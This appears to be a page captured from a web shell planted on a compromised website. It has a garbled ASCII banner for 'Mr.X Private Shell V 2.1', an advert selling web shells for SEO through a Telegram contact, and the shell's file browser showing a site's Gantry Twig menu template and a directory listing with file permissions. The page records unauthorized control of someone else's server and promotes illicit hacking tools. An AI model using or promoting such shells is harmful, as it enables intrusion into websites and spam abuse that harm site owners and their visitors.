__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{% extends 'forms/fields/select/selectize.html.twig' %}
{% block options %}
{{ parent() }}
{% set current = gantry.menu.getDefaultMenuName() %}
{% for menu_name,menu_title in gantry.menu.getMenuOptions() %}
<option
{# required attribute structures #}
{% if menu_name == value %}selected="selected"{% endif %}
value="{{ menu_name }}"
{# non-gloval attribute structures #}
{% if field.options.disabled in ['on', 'true', 1] %}disabled="disabled"{% endif %}
>{{ menu_title }}{{ (current == menu_name and gantry.menu.hasDefaultMenu()) ? ' ★' : '' }}</option>
{% endfor %}
{% endblock %}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| item.html.twig | File | 867 B | 0664 |
|
| list.html.twig | File | 705 B | 0664 |
|